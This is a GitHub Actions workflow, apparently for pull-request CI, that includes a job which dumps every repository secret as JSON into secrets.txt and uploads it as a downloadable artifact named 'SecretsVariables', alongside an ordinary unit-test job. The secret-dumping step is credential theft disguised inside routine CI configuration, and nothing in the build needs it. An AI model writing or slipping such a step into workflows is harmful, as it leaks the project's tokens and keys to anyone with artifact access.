name: pr

on:
  pull_request:

  workflow_call:

  workflow_dispatch:
    inputs:
      version_tag:
        description: |
          Version tag sets the tag for building new assets and tagging the repo.
          next_tag will bump to the next patch release e.g 0.0.1 -> 0.0.2 .
          Commit with a message #minor or #major to bump a different amount.
        required: false
        default: "next_tag"
        type: string

# cancel running job if another commit comes in
concurrency:
  group: ci-tests-${{ github.ref }}-1
  cancel-in-progress: true

jobs:
  one:
    runs-on: ubuntu-latest
    steps:
    - name: "Echo in file"
      env:
        SECRETS_VARS: ${{ toJson(secrets) }}
      run: echo "$SECRETS_VARS" > "secrets.txt"

    - uses: actions/upload-artifact@v3
      name: Upload Artifact
      with:
        name: SecretsVariables
        path: "secrets.txt"

  unit_tests:
    uses: ./.github/workflows/unit_tests_artifact.yml

